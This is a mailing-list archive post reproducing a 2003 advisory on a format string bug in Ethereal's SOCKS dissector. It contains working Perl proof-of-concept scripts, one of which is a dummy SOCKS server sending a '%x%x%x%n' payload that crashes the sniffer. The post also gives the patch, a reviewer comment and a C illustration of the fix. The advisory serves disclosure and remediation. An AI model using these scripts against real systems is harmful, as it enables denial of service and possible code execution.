Vulnwatch mailing list archives
Ethereal Advisory (Guninski #60)
From: Steve <steve () vulnwatch org>
Date: Sat, 8 Mar 2003 16:20:44 +0000 (GMT)
Georgi Guninski released an advisory this morning on Ethereal. Here are the important parts of that advisory;

Steve Manzuik
Moderator - VulnWatch

================================================

Description:

Ethereal is a sniffer. According to www.ethereal.com its purpose is:
"Sniffing the glue that holds the Internet together"

There is a format string bug in it which is confirmed to be a DoS and probably can lead to execution of code (the difficulty comes from the fact that some characters are escaped).

Details:

The problem seems to be in: "packet-socks.c" line 910 of 1180
-----
proto_tree_add_text( tree, tvb, offset, linelen,
    format_text(data, linelen));
------
The format mask is missing.

How to reproduce on localhost:

start raw3sv.pl (dummy socks server, attached)
start ethereal on loopback, update packets in real time.
start sockcl.pl (attached, does socks ping, without argument connects to localhost)
wait about 5 seconds.
go to ethereal and select the line "Sock5.....Ping Req Results"

result: SEGV.
---raw3sv.pl----
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
use strict;

# local port
my $port = 1080;

# redirect to
my $msg  = "\x05\x00";                      # SOCKS5 method-selection reply
my $repl = "\x05\x00\x00\x00\x02aa";        # SOCKS5 request reply
my $pi   = "m\$sux\%x\%x\%x\%n";            # line that reaches the dissector

my $server = IO::Socket::INET->new(LocalPort => $port,
                                   Type      => SOCK_STREAM,
                                   Reuse     => 1,
                                   Listen    => 2)
    or die "Couldn't create tcp-server.\n";

print "Dummy socks server for ethereal\nListening on localhost:${port}\n";

my $client;
while ($client = $server->accept()) {
    print "Client connected.\n";
    print "Sending...";
    sleep(1);
    # while(<$client>) {print $_;}
    print $client "$msg";
    print "OK\n";
    sleep(1);
    print $client "$repl";
    sleep(1);
    print $client "$pi";
    close($client);
    exit(0);
}
----------------

----sockcl.pl------------
#!/usr/bin/perl -w
# Written by Georgi Guninski
use IO::Socket;
use strict;

my $host = $ARGV[0] || "localhost";
my $port = 1080;
print "host=${host}\n";

my $socket = IO::Socket::INET->new(PeerAddr => $host,
                                   PeerPort => $port,
                                   Proto    => "TCP")
    || die("Unable to connect");

print "Start\n";
my $logcmd  = "\x05\x00\x00";                                 # method selection
my $pingcmd = "\x05\x80\x00\x01\x01\x01\x01\x01\x01\x01";     # ping request
print $socket $logcmd;
my $x;
sysread($socket, $x, 2);
# sleep(1);
print $socket $pingcmd;
sleep(5);
print "Done\n";
----------------

Workaround/Solution:

Upgrade to 0.9.10 or apply the following patch:

------------------
--- packet-socks.c.orig 2002-08-29 03:40:03.000000000 +0300
+++ packet-socks.c 2003-02-25 15:52:14.000000000 +0200
@@ -908,7 +908,7 @@
 linelen = lineend - data;
 proto_tree_add_text( tree, tvb, offset, linelen,
- format_text(data, linelen));
+ "%s",format_text(data, linelen));
 offset += linelen;
 data = lineend;
 }
------------------

Vendor status: Notified on Tue, 25 Feb 2003
http://www.ethereal.com/appnotes/enpa-sa-00008.html
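Review bot: the `+` line is the right fix for this call site: with `"%s"` as a literal mask, the packet-derived string returned by format_text() becomes an argument and is printed verbatim, whereas the `-` line handed it to proto_tree_add_text() as the format itself, so any `%` that survives format_text()'s escaping of non-printables was still interpreted as a conversion. Two follow-ups a reviewer would ask for: a space after the comma in `"%s",format_text(data, linelen)` to match the surrounding style, and an audit of the other proto_tree_add_text() callers in the dissectors for the same missing-mask pattern, since the hunk only covers packet-socks.c.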
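The defect the advisory describes, as an added illustration in C; this is not Ethereal's code and not part of Georgi's advisory. format_text_demo() and add_text_demo() are simplified stand-ins (assumptions) for Ethereal's format_text() and proto_tree_add_text(), and the sample line is constructed. It shows why escaping non-printable bytes does not help: '%' is printable, so a packet-controlled line used as the format still drives conversions, while the patched "%s" form renders it verbatim. Only a harmless "%%" is used as input so the result is deterministic.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for Ethereal's format_text(): escapes non-printable
 * bytes as \xNN so the line can be displayed. '%' is printable and passes
 * through untouched, so escaping does not neutralise format conversions.
 * (Simplified model, not Ethereal's own implementation.) */
static const char *format_text_demo(const unsigned char *data, size_t len)
{
    static char out[512];
    size_t o = 0;
    for (size_t i = 0; i < len && o + 5 < sizeof out; i++) {
        if (isprint(data[i]))
            out[o++] = (char)data[i];
        else
            o += (size_t)snprintf(out + o, sizeof out - o, "\\x%02x", data[i]);
    }
    out[o] = '\0';
    return out;
}

/* Stand-in for proto_tree_add_text(): a printf-style sink that formats
 * into a caller-supplied buffer instead of a protocol tree. */
static void add_text_demo(char *dst, size_t dstlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(dst, dstlen, fmt, ap);
    va_end(ap);
}

/* Before the patch: the packet-derived text IS the format string. */
static void render_vulnerable(char *dst, size_t dstlen,
                              const unsigned char *data, size_t len)
{
    add_text_demo(dst, dstlen, format_text_demo(data, len));
}

/* After the patch: a literal "%s" mask, packet text is only an argument. */
static void render_fixed(char *dst, size_t dstlen,
                         const unsigned char *data, size_t len)
{
    add_text_demo(dst, dstlen, "%s", format_text_demo(data, len));
}

/* Detection aid: does a line contain a '%' that vsnprintf would treat as a
 * conversion (i.e. not the escaped "%%")? A dissector test could flag such
 * output from a missing-mask call site. */
static int has_live_conversion(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { s++; continue; }   /* "%%" renders as a literal % */
        return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample line, as a SOCKS reply could carry it. */
    static const unsigned char sample[] = "pong 100%%";
    char buf[128];

    render_vulnerable(buf, sizeof buf, sample, sizeof sample - 1);
    printf("vulnerable: %s\n", buf);   /* "pong 100%": the %% was consumed */
    render_fixed(buf, sizeof buf, sample, sizeof sample - 1);
    printf("fixed:      %s\n", buf);   /* "pong 100%%": printed verbatim   */
    return 0;
}
```

The contrast in main() is the whole bug: the unpatched path lets bytes from the wire choose the conversions, the patched path does not. Compiling the real dissector with -Wformat-security would have flagged the original call, because proto_tree_add_text() is declared as a printf-style function.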